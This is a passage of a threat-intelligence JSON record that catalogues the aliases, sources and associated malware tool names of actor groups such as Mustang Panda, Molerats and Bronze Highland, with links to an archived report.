				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1162e0d4-b69c-423d-a4da-f3080d1d2b0c",
			"created_at": "2023-01-06T13:46:38.508262Z",
			"updated_at": "2026-04-10T02:00:03.006018Z",
			"deleted_at": null,
			"main_name": "Molerats",
			"aliases": [
				"Gaza Cybergang",
				"Operation Molerats",
				"Extreme Jackal",
				"ALUMINUM SARATOGA",
				"G0021",
				"BLACKSTEM",
				"Gaza Hackers Team",
				"Gaza cybergang"
			],
			"source_name": "MISPGALAXY:Molerats",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "19ac84cc-bb2d-4e0c-ace0-5a7659d89ac7",
			"created_at": "2022-10-25T16:07:23.422755Z",
			"updated_at": "2026-04-10T02:00:04.592069Z",
			"deleted_at": null,
			"main_name": "Bronze Highland",
			"aliases": [
				"Daggerfly",
				"Digging Taurus",
				"Evasive Panda",
				"Storm Cloud",
				"StormBamboo",
				"TAG-102",
				"TAG-112"
			],
			"source_name": "ETDA:Bronze Highland",
			"tools": [
				"Agentemis",
				"CDDS",
				"CloudScout",
				"Cobalt Strike",
				"CobaltStrike",
				"DazzleSpy",
				"KsRemote",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MacMa",
				"Macma",
				"MgBot",
				"Mgmbot",
				"NetMM",
				"Nightdoor",
				"OSX.CDDS",
				"POCOSTICK",
				"RELOADEXT",
				"Suzafk",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4f7d2815-7504-4818-bf8d-bba18161b111",
			"created_at": "2025-08-07T02:03:24.613342Z",
			"updated_at": "2026-04-10T02:00:03.732192Z",
			"deleted_at": null,
			"main_name": "BRONZE HIGHLAND",
			"aliases": [
				"Daggerfly",
				"Daggerfly ",
				"Evasive Panda ",
				"Evasive Panda ",
				"Storm Bamboo "
			],
			"source_name": "Secureworks:BRONZE HIGHLAND",
			"tools": [
				"Cobalt Strike",
				"KsRemote",
				"Macma",
				"MgBot",
				"Nightdoor",
				"PlugX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "02c9f3f6-5d10-456b-9e63-750286048149",
			"created_at": "2022-10-25T16:07:23.722884Z",
			"updated_at": "2026-04-10T02:00:04.72726Z",
			"deleted_at": null,
			"main_name": "Inception Framework",
			"aliases": [
				"ATK 116",
				"Blue Odin",
				"Clean Ursa",
				"Cloud Atlas",
				"G0100",
				"Inception Framework",
				"Operation Cloud Atlas",
				"Operation RedOctober",
				"The Rocra"
			],
			"source_name": "ETDA:Inception Framework",
			"tools": [
				"Lastacloud",
				"PowerShower",
				"VBShower"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "847f600c-cf90-44c0-8b39-fb0d5adfcef4",
			"created_at": "2022-10-25T16:07:23.875541Z",
			"updated_at": "2026-04-10T02:00:04.768142Z",
			"deleted_at": null,
			"main_name": "Molerats",
			"aliases": [
				"ATK 89",
				"Aluminum Saratoga",
				"Extreme Jackal",
				"G0021",
				"Gaza Cybergang",
				"Gaza Hackers Team",
				"Molerats",
				"Operation DustySky",
				"Operation DustySky Part 2",
				"Operation Molerats",
				"Operation Moonlight",
				"Operation SneakyPastes",
				"Operation TopHat",
				"TA402",
				"TAG-CT5"
			],
			"source_name": "ETDA:Molerats",
			"tools": [
				"BadPatch",
				"Bladabindi",
				"BrittleBush",
				"Chymine",
				"CinaRAT",
				"Darkmoon",
				"Downeks",
				"DropBook",
				"DustySky",
				"ExtRat",
				"Gen:Trojan.Heur.PT",
				"H-Worm",
				"H-Worm RAT",
				"Houdini",
				"Houdini RAT",
				"Hworm",
				"Iniduoh",
				"IronWind",
				"Jenxcus",
				"JhoneRAT",
				"Jorik",
				"KasperAgent",
				"Kognito",
				"LastConn",
				"Micropsia",
				"MoleNet",
				"Molerat Loader",
				"NeD Worm",
				"NimbleMamba",
				"Njw0rm",
				"Pierogi",
				"Poison Ivy",
				"Quasar RAT",
				"QuasarRAT",
				"SPIVY",
				"Scote",
				"SharpSploit",
				"SharpStage",
				"WSHRAT",
				"WelcomeChat",
				"Xtreme RAT",
				"XtremeRAT",
				"Yggdrasil",
				"dinihou",
				"dunihi",
				"njRAT",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438978,
	"ts_updated_at": 1775792283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.pdf",
		"text": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.txt",
		"img": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.jpg"
	}
}